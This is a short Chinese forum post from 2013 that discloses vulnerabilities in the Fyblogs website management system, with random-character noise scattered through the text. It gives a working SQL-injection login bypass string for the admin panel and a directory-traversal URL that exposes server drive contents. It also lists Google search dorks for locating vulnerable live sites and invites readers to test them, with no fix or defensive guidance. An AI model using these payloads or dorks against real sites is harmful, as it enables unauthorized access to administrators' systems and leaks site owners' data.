漏洞类型: 未授权访问/权限绕过
) V& t1 c( b) r2 T' K+ {
0 | i7 A9 d7 S9 ?& M s0 U- n简要描述:* g/ h+ ~" L- |& d% b
0 K9 P: P* b j6 m9 V7 b2 qFyblogs网站管理系统,,后台存在万能密码,后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!
- z. u$ Z2 k( |% a9 G6 x' p) z6 L* }9 [
详细说明:
4 I. Z. N9 |. L5 h. v$ R
" A5 h2 B( d% ^: s后台万能密码 'or'='or'
0 R" s# L% H( g9 ]9 q3 B后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!6 e- |7 N2 h, ]& P
admin/uploadfile.asp?currentFolder=/upfiles/../. k- m; m: Y: v& V1 b6 J
1 a+ j/ Q1 ]# e- C+ O7 B漏洞证明:5 [9 i5 n+ V5 F5 u- v. c5 G
0 |, e9 O6 q; P; O* ]: p ]谷歌:inurl:type.asp?id=1 新闻中心
$ S( y$ R! W o, E$ }7 c或者 :inurl:download_ok.asp?2 |3 {; U8 C+ ?) I# r8 g
* @% e6 ~6 Y0 S: ^* x8 E) a- x
可以测试5 ~% p e* s; b! X' H1 c
+ [/ n5 f- j8 d; ?% O- }5 |9 p N
' J' N% x2 F ~6 G. c# W
|
发表于 2013-3-7 13:07:46
收藏
支持
反对